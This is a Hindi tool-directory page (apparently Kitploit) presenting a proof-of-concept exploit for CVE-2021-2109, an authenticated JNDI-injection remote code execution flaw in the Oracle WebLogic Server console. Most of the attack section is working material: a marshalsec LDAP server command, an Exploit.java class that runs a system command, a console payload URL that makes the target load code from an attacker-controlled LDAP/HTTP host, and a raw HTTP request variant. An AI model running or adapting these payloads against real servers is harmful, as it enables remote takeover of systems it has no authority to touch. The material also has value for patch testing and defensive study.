Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-2109 — CVE-2021-2109 && JNDI के माध्यम से Weblogic Server RCE | Kitploit
उपकरण/GitHubGitHub/al1ex/cve-2021-2109
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubal1ex/cve-2021-2109

CVE-2021-2109

CVE-2021-2109 && JNDI के माध्यम से Weblogic Server RCE

रिपॉजिटरी देखें
311015 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

Oracle Fusion Middleware के Oracle WebLogic Server उत्पाद (घटक: कंसोल) में एक भेद्यता। प्रभावित समर्थित संस्करण 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 और 14.1.1.0.0 हैं। आसानी से शोषण योग्य भेद्यता उच्च विशेषाधिकार प्राप्त हमलावर को HTTP के माध्यम से नेटवर्क पहुँच के साथ Oracle WebLogic Server से समझौता करने की अनुमति देती है। इस भेद्यता के सफल हमलों के परिणामस्वरूप Oracle WebLogic Server का अधिग्रहण हो सकता है। CVSS 3.1 आधार स्कोर 7.2 (गोपनीयता, अखंडता और उपलब्धता पर प्रभाव)। CVSS वेक्टर: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)।

शर्तें

लॉगिन प्रमाणीकरण आवश्यक

RCE कैसे करें

चरण 1: Weblogic सेटअप करें

setup

चरण 2: लॉगिन करें

login

login2

चरण 3: JNDI सर्वर सेटअप करें
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.174.1:4444/#Exploit 1088

jndi

चरण 4: Exploit.java को कंपाइल करें
javac Exploit.java
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

execute

चरण 5: एक सरल HTTPServer सेटअप करें

httpserver

चरण 6: पेलोड निष्पादित करें
http://192.168.174.144:7001/console/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.174.1:1088/Exploit;AdminServer")&returnTo=al1ex

payload

result

LDAP और HTTPServer लॉग:

logs

एक और POC
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.174;1:1088/Exploit;AdminServer%22) HTTP/1.1
Host: 192.168.174.144:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=GZUoX_MV8_7OMiv-hhhzix8-zbfknZI4Prm_41N4vUPBEt1vP8mf!2017534379; Hm_lvt_eaa57ca47dacb4ad4f5a257001a3457c=1605675257,1605704689,1605871061,1606205262; JSESSIONID=6qYoDKwKLN2nLGhJiJ1CtcaxZ8ENfjTU7B2n0GmG5HTVDrJxPkg3!655738588
Connection: close

burpsuite में परिणाम:

result

weblogic सर्वर में परिणाम:

weblogic

LDAP और HTTPServer लॉग (पहला लॉग आइटम poc1 का है):

logs2

स्टेक जानकारी:
टूल डाउनलोड करें